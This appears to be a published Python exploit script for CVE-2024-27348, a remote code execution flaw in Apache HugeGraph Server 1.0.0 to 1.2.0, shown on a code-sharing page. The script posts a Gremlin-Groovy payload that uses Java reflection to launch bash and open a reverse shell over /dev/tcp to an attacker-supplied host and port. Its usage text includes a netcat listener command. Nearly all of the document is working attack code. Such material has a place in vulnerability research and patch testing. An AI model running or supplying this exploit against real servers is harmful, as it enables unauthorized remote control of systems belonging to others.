扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 |
# Exploit Title: Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE) # Exploit Author: Yesith Alvarez # Vendor Homepage: https://hugegraph.apache.org/docs/download/download/ # Version: Apache HugeGraph 1.0.0 - 1.2.0 # CVE : CVE-2024–27348 from requests import Request, Session import sys import json def title(): print(''' ______ _______ ____ ___ __________ _____ _____ _____ / ___\ \ / / ____| |___ \ / _ \___ \| || ||___ \___|___ /| || |( _ ) | |\ \ / /|_| _____ __) | | | |__) | || |_ _____ __) | / /|_ \| || |_ / _ \ | |___\ V / | |__|_____/ __/| |_| / __/|__ _|_____/ __/ / /___) |__ _| (_) | \____|\_/|_____| |_____|\___/_____||_||_____/_/|____/ |_|\___/ [+] Reverse shell Author: Yesith Alvarez Github: https://github.com/yealvarez Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/ Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024–27348/exploit.py ''') def exploit(url, lhost, lport): payload = {"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"VICARIUS\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"bash\", \"-c\", \"bash -i>&/dev/tcp/"+lhost+"/"+lport+"\", \"0>&1\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}} headers = { 'Content-Type': 'application/json'} s = Session() url = url + "/gremlin" req = Request('POST', url, json=payload, headers=headers) prepped = req.prepare() del prepped.headers['Content-Type'] resp = s.send(prepped, verify=False, timeout=15) print(prepped.headers) print(url) print(resp.headers) print(payload) print(resp.status_code) print(resp.text) if __name__ == '__main__': title() if(len(sys.argv) < 4): print('[+] USAGE: python3 %s https://<target_url> lhost lport \n'%(sys.argv[0])) print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.2 4444\n'%(sys.argv[0])) print('[+] Do not forget to run the listener: nc -lvp 4444\n') exit(0) else: exploit(sys.argv[1],sys.argv[2],sys.argv[3]) |
体验盒子
